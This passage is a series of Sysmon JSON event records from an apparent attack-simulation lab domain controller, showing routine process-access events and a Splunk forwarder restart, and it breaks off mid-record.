{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3184,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3185,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3186,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3187,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3188,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3189,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3190,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3191,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-001016560500}\r\nTargetProcessId: 5004\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-001016560500}","TargetProcessId":"5004","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3192,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.684\r\nProcessGuid: {E2A3D6B1-10FF-5F25-0000-0010D8570500}\r\nProcessId: 4864\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2792\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: 